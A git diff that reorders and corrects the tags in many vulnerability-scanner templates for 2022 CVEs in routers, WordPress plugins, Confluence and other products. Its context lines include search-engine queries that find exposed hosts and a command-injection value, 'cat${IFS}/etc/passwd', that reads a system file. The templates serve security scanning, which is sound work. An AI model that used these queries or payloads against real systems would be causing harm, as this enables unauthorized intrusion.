--- a/http/cves/2022/CVE-2022-25568.yaml
+++ b/http/cves/2022/CVE-2022-25568.yaml
@@ -24,7 +24,7 @@ info:
vendor: motioneye_project
product: motioneye
shodan-query: html:"MotionEye"
- tags: cve,cve2023,motioneye,config,motioneye_project
+ tags: cve,cve2022,motioneye,config,motioneye_project
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml
index 3bf7045c63..617fb4533e 100644
--- a/http/cves/2022/CVE-2022-2599.yaml
+++ b/http/cves/2022/CVE-2022-2599.yaml
@@ -28,7 +28,7 @@ info:
vendor: anti-malware_security_and_brute-force_firewall_project
product: anti-malware_security_and_brute-force_firewall
framework: wordpress
- tags: wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,cve,cve2022,anti-malware_security_and_brute-force_firewall_project
+ tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml
index f19ab18dd4..ebc02a56a2 100644
--- a/http/cves/2022/CVE-2022-26134.yaml
+++ b/http/cves/2022/CVE-2022-26134.yaml
@@ -30,7 +30,7 @@ info:
vendor: atlassian
product: confluence_data_center
shodan-query: http.component:"Atlassian Confluence"
- tags: packetstorm,cve,cve2022,confluence,rce,ognl,oast,kev,atlassian
+ tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml
index ca6ac3eaee..60fdf5998e 100644
--- a/http/cves/2022/CVE-2022-26138.yaml
+++ b/http/cves/2022/CVE-2022-26138.yaml
@@ -29,7 +29,7 @@ info:
vendor: atlassian
product: questions_for_confluence
shodan-query: http.component:"Atlassian Confluence"
- tags: cve,cve2022,confluence,atlassian,default-login,kev
+ tags: cve2022,cve,confluence,atlassian,default-login,kev
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml
index cb38558125..14b082de58 100644
--- a/http/cves/2022/CVE-2022-2627.yaml
+++ b/http/cves/2022/CVE-2022-2627.yaml
@@ -27,7 +27,7 @@ info:
product: newspaper
framework: wordpress
publicwww-query: "/wp-content/themes/Newspaper"
- tags: xss,wordpress,wp,wp-theme,newspaper,wpscan,cve,cve2022,tagdiv
+ tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml
index cd8c24f565..34f3e7293c 100644
--- a/http/cves/2022/CVE-2022-2633.yaml
+++ b/http/cves/2022/CVE-2022-2633.yaml
@@ -30,7 +30,7 @@ info:
vendor: plugins360
product: all-in-one_video_gallery
framework: wordpress
- tags: cve2022,wp-plugin,unauth,ssrf,wpscan,cve,wordpress,wp,all-in-one-video-gallery,plugins360
+ tags: cve2022,cve,wp-plugin,unauth,ssrf,wpscan,wordpress,wp,all-in-one-video-gallery,plugins360
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml
index 7fb74091a7..8e7246c2b6 100644
--- a/http/cves/2022/CVE-2022-26352.yaml
+++ b/http/cves/2022/CVE-2022-26352.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: dotcms
product: dotcms
- tags: packetstorm,cve,cve2022,rce,dotcms,kev,fileupload,intrusive
+ tags: cve,cve2022,packetstorm,rce,dotcms,kev,fileupload,intrusive
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml
index eb578d738d..80b3d463dc 100644
--- a/http/cves/2022/CVE-2022-26833.yaml
+++ b/http/cves/2022/CVE-2022-26833.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: openautomationsoftware
product: oas_platform
- tags: cve,cve2022,oas,oss,unauth,openautomationsoftware
+ tags: cve2022,cve,oas,oss,unauth,openautomationsoftware
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml
index a261d5f1cf..0b3bf33252 100644
--- a/http/cves/2022/CVE-2022-26960.yaml
+++ b/http/cves/2022/CVE-2022-26960.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: std42
product: elfinder
- tags: cve,cve2022,lfi,elfinder,std42
+ tags: cve2022,cve,lfi,elfinder,std42
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml
index c0fe0988af..ea1ebacc0d 100644
--- a/http/cves/2022/CVE-2022-2756.yaml
+++ b/http/cves/2022/CVE-2022-2756.yaml
@@ -28,7 +28,7 @@ info:
vendor: kavitareader
product: kavita
shodan-query: title:"kavita"
- tags: ssrf,kavita,authenticated,huntr,cve,cve2022,intrusive,kavitareader
+ tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml
index be743bbba6..3f492e5094 100644
--- a/http/cves/2022/CVE-2022-27593.yaml
+++ b/http/cves/2022/CVE-2022-27593.yaml
@@ -28,7 +28,7 @@ info:
vendor: qnap
product: photo_station
shodan-query: title:"QNAP"
- tags: cve,cve2022,qnap,lfi,kev
+ tags: cve2022,cve,qnap,lfi,kev
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml
index d3ab39476e..234c032c15 100644
--- a/http/cves/2022/CVE-2022-27849.yaml
+++ b/http/cves/2022/CVE-2022-27849.yaml
@@ -28,7 +28,7 @@ info:
product: simple_ajax_chat
framework: wordpress
google-query: inurl:/wp-content/plugins/simple-ajax-chat/
- tags: wp,wordpress,wp-plugin,cve,cve2022,disclosure,plugin-planet
+ tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml
index d853510b15..0f803a07d5 100644
--- a/http/cves/2022/CVE-2022-27927.yaml
+++ b/http/cves/2022/CVE-2022-27927.yaml
@@ -29,7 +29,7 @@ info:
max-request: 1
vendor: microfinance_management_system_project
product: microfinance_management_system
- tags: microfinance,edb,cve,cve2022,sqli,microfinance_management_system_project
+ tags: cve,cve2022,microfinance,edb,sqli,microfinance_management_system_project
variables:
num: "999999999"
diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml
index 5789802c07..1e2c35608b 100644
--- a/http/cves/2022/CVE-2022-28080.yaml
+++ b/http/cves/2022/CVE-2022-28080.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: event_management_system_project
product: event_management_system
- tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms,intrusive,event_management_system_project
+ tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml
index 81e30b0674..2882c2da1d 100644
--- a/http/cves/2022/CVE-2022-28117.yaml
+++ b/http/cves/2022/CVE-2022-28117.yaml
@@ -28,7 +28,7 @@ info:
max-request: 4
vendor: naviwebs
product: navigate_cms
- tags: authenticated,packetstorm,cve,cve2022,ssrf,navigate,cms,lfi,intrusive,naviwebs
+ tags: cve,cve2022,authenticated,packetstorm,ssrf,navigate,cms,lfi,intrusive,naviwebs
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml
index 6742027ed9..35a2ea94ae 100644
--- a/http/cves/2022/CVE-2022-28290.yaml
+++ b/http/cves/2022/CVE-2022-28290.yaml
@@ -27,7 +27,7 @@ info:
vendor: welaunch
product: wordpress_country_selector
framework: wordpress
- tags: wordpress-country-selector,wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,welaunch
+ tags: cve,cve2022,wordpress-country-selector,wpscan,wp,wordpress,wp-plugin,xss,welaunch
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml
index b08bc457d2..18361d085b 100644
--- a/http/cves/2022/CVE-2022-28363.yaml
+++ b/http/cves/2022/CVE-2022-28363.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: reprisesoftware
product: reprise_license_manager
- tags: xss,rlm,packetstorm,cve,cve2022,reprisesoftware
+ tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml
index dbffc53736..7de6427c41 100644
--- a/http/cves/2022/CVE-2022-28365.yaml
+++ b/http/cves/2022/CVE-2022-28365.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: reprisesoftware
product: reprise_license_manager
- tags: rlm,packetstorm,cve,cve2022,exposure,reprisesoftware
+ tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml
index 77c0f07512..0369573d19 100644
--- a/http/cves/2022/CVE-2022-2863.yaml
+++ b/http/cves/2022/CVE-2022-2863.yaml
@@ -26,7 +26,7 @@ info:
vendor: wpvivid
product: migration\,_backup\,_staging
framework: wordpress
- tags: wp,wpscan,seclists,packetstorm,authenticated,cve,cve2022,lfi,wordpress,wp-plugin,wpvivid
+ tags: cve,cve2022,wp,wpscan,seclists,packetstorm,authenticated,lfi,wordpress,wp-plugin,wpvivid
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml
index c926af055b..f2ff382b42 100644
--- a/http/cves/2022/CVE-2022-28955.yaml
+++ b/http/cves/2022/CVE-2022-28955.yaml
@@ -28,7 +28,7 @@ info:
vendor: dlink
product: dir-816l_firmware
shodan-query: http.html:"DIR-816L"
- tags: cve,cve2022,dlink,exposure
+ tags: cve2022,cve,dlink,exposure
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml
index ebd1391077..3ca0a240b8 100644
--- a/http/cves/2022/CVE-2022-29004.yaml
+++ b/http/cves/2022/CVE-2022-29004.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: phpgurukul
product: e-diary_management_system
- tags: cve,cve2022,xss,authenticated,edms,phpgurukul
+ tags: cve2022,cve,xss,authenticated,edms,phpgurukul
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml
index 3bcd2f8c9c..04a2392e98 100644
--- a/http/cves/2022/CVE-2022-29006.yaml
+++ b/http/cves/2022/CVE-2022-29006.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: phpgurukul
product: directory_management_system
- tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul
+ tags: cve2022,cve,sqli,auth-bypass,edb,phpgurukul
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml
index 643e6f8ccd..cd4ad4d959 100644
--- a/http/cves/2022/CVE-2022-29009.yaml
+++ b/http/cves/2022/CVE-2022-29009.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: phpgurukul
product: cyber_cafe_management_system
- tags: cve2022,sqli,auth-bypass,edb,cve,phpgurukul
+ tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml
index 0b10943bb1..afc31bd6d3 100644
--- a/http/cves/2022/CVE-2022-29014.yaml
+++ b/http/cves/2022/CVE-2022-29014.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: razer
product: sila_firmware
- tags: edb,packetstorm,cve,cve2022,razer,lfi,router
+ tags: cve,cve2022,edb,packetstorm,razer,lfi,router
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml
index b9e107dc46..cd3bf561be 100644
--- a/http/cves/2022/CVE-2022-29298.yaml
+++ b/http/cves/2022/CVE-2022-29298.yaml
@@ -28,7 +28,7 @@ info:
vendor: contec
product: sv-cpt-mc310_firmware
shodan-query: http.html:"SolarView Compact"
- tags: lfi,solarview,edb,cve,cve2022,contec
+ tags: cve,cve2022,lfi,solarview,edb,contec
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-29299.yaml b/http/cves/2022/CVE-2022-29299.yaml
index b4c565db92..1f297af8b0 100644
--- a/http/cves/2022/CVE-2022-29299.yaml
+++ b/http/cves/2022/CVE-2022-29299.yaml
@@ -19,7 +19,7 @@ info:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-244067125
- tags: cve,cve2022,xss,solarview,edb
+ tags: cve2022,cve,xss,solarview,edb
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml
index 0cf9ca0db9..8bcf6cf5e9 100644
--- a/http/cves/2022/CVE-2022-29303.yaml
+++ b/http/cves/2022/CVE-2022-29303.yaml
@@ -29,7 +29,7 @@ info:
vendor: contec
product: sv-cpt-mc310_firmware
shodan-query: http.html:"SolarView Compact"
- tags: injection,solarview,edb,packetstorm,cve,cve2022,rce,kev,contec
+ tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec
variables:
cmd: "cat${IFS}/etc/passwd"
diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml
index b8b3d27d31..3cc59f18f4 100644
--- a/http/cves/2022/CVE-2022-29383.yaml
+++ b/http/cves/2022/CVE-2022-29383.yaml
@@ -29,7 +29,7 @@ info:
max-request: 2
vendor: netgear
product: ssl312_firmware
- tags: cve,cve2022,sqli,netgear,router
+ tags: cve2022,cve,sqli,netgear,router
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml
index c083da7deb..faa31725ac 100644
--- a/http/cves/2022/CVE-2022-30073.yaml
+++ b/http/cves/2022/CVE-2022-30073.yaml
@@ -27,7 +27,7 @@ info:
max-request: 4
vendor: wbce
product: wbce_cms
- tags: cve,cve2022,wbcecms,xss,wbce
+ tags: cve2022,cve,wbcecms,xss,wbce
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml
index 848b99789a..2edc24ad42 100644
--- a/http/cves/2022/CVE-2022-30489.yaml
+++ b/http/cves/2022/CVE-2022-30489.yaml
@@ -28,7 +28,7 @@ info:
vendor: wavlink
product: wn535g3_firmware
shodan-query: http.title:"Wi-Fi APP Login"
- tags: xss,cve2022,wavlink,cve,router,iot
+ tags: cve,cve2022,xss,wavlink,router,iot
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml
index 33237a4c22..1befde6477 100644
--- a/http/cves/2022/CVE-2022-30513.yaml
+++ b/http/cves/2022/CVE-2022-30513.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: school_dormitory_management_system_project
product: school_dormitory_management_system
- tags: cve,cve2022,xss,authenticated,school_dormitory_management_system_project
+ tags: cve2022,cve,xss,authenticated,school_dormitory_management_system_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml
index ab4ed10718..476b191cda 100644
--- a/http/cves/2022/CVE-2022-30525.yaml
+++ b/http/cves/2022/CVE-2022-30525.yaml
@@ -29,7 +29,7 @@ info:
vendor: zyxel
product: usg_flex_100w_firmware
shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
- tags: packetstorm,zyxel,cve,cve2022,firewall,unauth,kev,msf,rce
+ tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml
index 4f665fbc8b..020e0cd918 100644
--- a/http/cves/2022/CVE-2022-3062.yaml
+++ b/http/cves/2022/CVE-2022-3062.yaml
@@ -27,7 +27,7 @@ info:
vendor: simplefilelist
product: simple-file-list
framework: wordpress
- tags: cve,authenticated,wordpress,wp-plugin,wp,wpscan,cve2022,xss,simple-file-list,simplefilelist
+ tags: cve,cve2022,authenticated,wordpress,wp-plugin,wp,wpscan,xss,simple-file-list,simplefilelist
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml
index 04ea9627d5..d91866e763 100644
--- a/http/cves/2022/CVE-2022-30776.yaml
+++ b/http/cves/2022/CVE-2022-30776.yaml
@@ -30,7 +30,7 @@ info:
vendor: atmail
product: atmail
shodan-query: http.html:"atmail"
- tags: cve,cve2022,atmail,xss
+ tags: cve2022,cve,atmail,xss
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml
index eda5c4e739..fc0c074195 100644
--- a/http/cves/2022/CVE-2022-31126.yaml
+++ b/http/cves/2022/CVE-2022-31126.yaml
@@ -29,7 +29,7 @@ info:
vendor: roxy-wi
product: roxy-wi
shodan-query: http.html:"Roxy-WI"
- tags: cve,cve2022,rce,unauth,roxy,packetstorm,roxy-wi
+ tags: cve2022,cve,rce,unauth,roxy,packetstorm,roxy-wi
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml
index 9be0d5cc32..487cd62e14 100644
--- a/http/cves/2022/CVE-2022-31269.yaml
+++ b/http/cves/2022/CVE-2022-31269.yaml
@@ -29,7 +29,7 @@ info:
vendor: nortekcontrol
product: emerge_e3_firmware
shodan-query: http.title:"Linear eMerge"
- tags: cve2022,emerge,exposure,packetstorm,cve,nortekcontrol
+ tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml
index 934fb62a7f..b1414efbf5 100644
--- a/http/cves/2022/CVE-2022-31373.yaml
+++ b/http/cves/2022/CVE-2022-31373.yaml
@@ -27,7 +27,7 @@ info:
vendor: contec
product: sv-cpt-mc310_firmware
shodan-query: http.html:"SolarView Compact"
- tags: cve,cve2022,xss,solarview,contec
+ tags: cve2022,cve,xss,solarview,contec
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml
index 93e4c16c77..74c60da650 100644
--- a/http/cves/2022/CVE-2022-3142.yaml
+++ b/http/cves/2022/CVE-2022-3142.yaml
@@ -28,7 +28,7 @@ info:
product: nex-forms
framework: wordpress
publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/
- tags: wpscan,packetstorm,cve,cve2022,wordpress,sqli,wp-plugin,wp,authenticated,basixonline
+ tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml
index bdbef3fe68..f841d042e8 100644
--- a/http/cves/2022/CVE-2022-31499.yaml
+++ b/http/cves/2022/CVE-2022-31499.yaml
@@ -30,7 +30,7 @@ info:
vendor: nortekcontrol
product: emerge_e3_firmware
shodan-query: title:"eMerge"
- tags: packetstorm,cve,cve2022,emerge,rce,nortekcontrol
+ tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml
index 65f1df65a0..c8023a8ef1 100644
--- a/http/cves/2022/CVE-2022-31656.yaml
+++ b/http/cves/2022/CVE-2022-31656.yaml
@@ -28,7 +28,7 @@ info:
vendor: vmware
product: identity_manager
shodan-query: http.favicon.hash:-1250474341
- tags: cve,cve2022,vmware,lfi
+ tags: cve2022,cve,vmware,lfi
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml
index d38c08f056..3a10983be0 100644
--- a/http/cves/2022/CVE-2022-31798.yaml
+++ b/http/cves/2022/CVE-2022-31798.yaml
@@ -30,7 +30,7 @@ info:
vendor: nortekcontrol
product: emerge_e3_firmware
shodan-query: http.title:"eMerge"
- tags: cve2022,emerge,nortek,xss,packetstorm,cve,nortekcontrol
+ tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml
index cb3a5fd266..80a52751e9 100644
--- a/http/cves/2022/CVE-2022-31814.yaml
+++ b/http/cves/2022/CVE-2022-31814.yaml
@@ -30,7 +30,7 @@ info:
vendor: netgate
product: pfblockerng
framework: pfsense
- tags: packetstorm,cve,cve2022,pfsense,pfblockerng,rce,oast,netgate
+ tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml
index cc143f010b..b728a7b68b 100644
--- a/http/cves/2022/CVE-2022-31984.yaml
+++ b/http/cves/2022/CVE-2022-31984.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
- tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
+ tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project
variables:
num: '999999999'
diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml
index b91fd54e26..89901e885f 100644
--- a/http/cves/2022/CVE-2022-32409.yaml
+++ b/http/cves/2022/CVE-2022-32409.yaml
@@ -27,7 +27,7 @@ info:
vendor: softwarepublico
product: i3geo
shodan-query: http.html:"i3geo"
- tags: cve,cve2022,i3geo,lfi,softwarepublico
+ tags: cve2022,cve,i3geo,lfi,softwarepublico
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml
index 5f96993209..c0c49d3908 100644
--- a/http/cves/2022/CVE-2022-3242.yaml
+++ b/http/cves/2022/CVE-2022-3242.yaml
@@ -25,7 +25,7 @@ info:
vendor: microweber
product: microweber
shodan-query: http.favicon.hash:780351152
- tags: huntr,xss,cve,cve2023,microweber
+ tags: cve,cve2022,huntr,xss,microweber
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml
index 230e81c3ae..b6108ac3d0 100644
--- a/http/cves/2022/CVE-2022-32429.yaml
+++ b/http/cves/2022/CVE-2022-32429.yaml
@@ -29,7 +29,7 @@ info:
vendor: megatech
product: msnswitch_firmware
shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
- tags: config,dump,packetstorm,cve,cve2022,msmswitch,unauth,switch,megatech
+ tags: cve2022,cve,config,dump,packetstorm,msmswitch,unauth,switch,megatech
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml
index 460874eb38..214dd0a91d 100644
--- a/http/cves/2022/CVE-2022-32770.yaml
+++ b/http/cves/2022/CVE-2022-32770.yaml
@@ -28,7 +28,7 @@ info:
vendor: wwbn
product: avideo
shodan-query: http.html:"AVideo"
- tags: cve,cve2022,avideo,xss,wwbn
+ tags: cve2022,cve,avideo,xss,wwbn
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml
index f662fa2ea0..155c3f2ff7 100644
--- a/http/cves/2022/CVE-2022-32772.yaml
+++ b/http/cves/2022/CVE-2022-32772.yaml
@@ -28,7 +28,7 @@ info:
vendor: wwbn
product: avideo
shodan-query: http.html:"AVideo"
- tags: cve,cve2022,avideo,xss,wwbn
+ tags: cve2022,cve,avideo,xss,wwbn
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml
index e7b34e00e7..15e4f6d9cd 100644
--- a/http/cves/2022/CVE-2022-33174.yaml
+++ b/http/cves/2022/CVE-2022-33174.yaml
@@ -27,7 +27,7 @@ info:
vendor: powertekpdus
product: basic_pdu_firmware
shodan-query: http.html:"Powertek"
- tags: cve,cve2022,powertek,auth-bypass,powertekpdus
+ tags: cve2022,cve,powertek,auth-bypass,powertekpdus
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml
index 971a280609..66b95bbac8 100644
--- a/http/cves/2022/CVE-2022-33891.yaml
+++ b/http/cves/2022/CVE-2022-33891.yaml
@@ -30,7 +30,7 @@ info:
vendor: apache
product: spark
shodan-query: title:"Spark Master at"
- tags: cve2022,apache,spark,authenticated,kev,packetstorm,cve
+ tags: cve2022,cve,apache,spark,authenticated,kev,packetstorm
variables:
command: "echo CVE-2022-33891 | rev"
diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml
index 5bf3586519..eeef8fe3b4 100644
--- a/http/cves/2022/CVE-2022-33901.yaml
+++ b/http/cves/2022/CVE-2022-33901.yaml
@@ -28,7 +28,7 @@ info:
vendor: multisafepay
product: multisafepay_plugin_for_woocommerce
framework: wordpress
- tags: cve,cve2022,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce
+ tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml
index 10149a5dc3..0c5e3a5a99 100644
--- a/http/cves/2022/CVE-2022-33965.yaml
+++ b/http/cves/2022/CVE-2022-33965.yaml
@@ -30,7 +30,7 @@ info:
product: wp_visitor_statistics
framework: wordpress
google-query: inurl:"/wp-content/plugins/wp-stats-manager"
- tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market
+ tags: cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml
index 5ab0c6836e..f12d13a330 100644
--- a/http/cves/2022/CVE-2022-34046.yaml
+++ b/http/cves/2022/CVE-2022-34046.yaml
@@ -29,7 +29,7 @@ info:
vendor: wavlink
product: wn533a8_firmware
shodan-query: http.title:"Wi-Fi APP Login"
- tags: packetstorm,cve,cve2022,wavlink,router,exposure
+ tags: cve,cve2022,packetstorm,wavlink,router,exposure
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml
index 33b1b9a2f5..442f466ad5 100644
--- a/http/cves/2022/CVE-2022-34047.yaml
+++ b/http/cves/2022/CVE-2022-34047.yaml
@@ -29,7 +29,7 @@ info:
vendor: wavlink
product: wl-wn530hg4_firmware
shodan-query: http.title:"Wi-Fi APP Login"
- tags: cve2022,wavlink,router,exposure,packetstorm,cve
+ tags: cve,cve2022,wavlink,router,exposure,packetstorm
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml
index 317ab391c2..8422775e38 100644
--- a/http/cves/2022/CVE-2022-34048.yaml
+++ b/http/cves/2022/CVE-2022-34048.yaml
@@ -29,7 +29,7 @@ info:
vendor: wavlink
product: wn533a8_firmware
shodan-query: http.html:"Wavlink"
- tags: cve2022,wavlink,xss,router,edb,cve
+ tags: cve2022,cve,wavlink,xss,router,edb
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml
index 07ce9a8517..50fc2ad744 100644
--- a/http/cves/2022/CVE-2022-34094.yaml
+++ b/http/cves/2022/CVE-2022-34094.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: softwarepublico
product: i3geo
- tags: cve,cve2022,i3geo,xss,softwarepublico
+ tags: cve2022,cve,i3geo,xss,softwarepublico
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml
index 9b551db372..81956a524e 100644
--- a/http/cves/2022/CVE-2022-34753.yaml
+++ b/http/cves/2022/CVE-2022-34753.yaml
@@ -28,7 +28,7 @@ info:
vendor: schneider-electric
product: spacelogic_c-bus_home_controller_firmware
shodan-query: html:"SpaceLogic C-Bus"
- tags: cve,cve2022,iot,spacelogic,rce,oast,packetstorm,schneider-electric
+ tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml
index 9aeb08cbb2..b4d46bf58b 100644
--- a/http/cves/2022/CVE-2022-3484.yaml
+++ b/http/cves/2022/CVE-2022-3484.yaml
@@ -28,7 +28,7 @@ info:
product: wpb_show_core
framework: wordpress
google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php
- tags: wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project
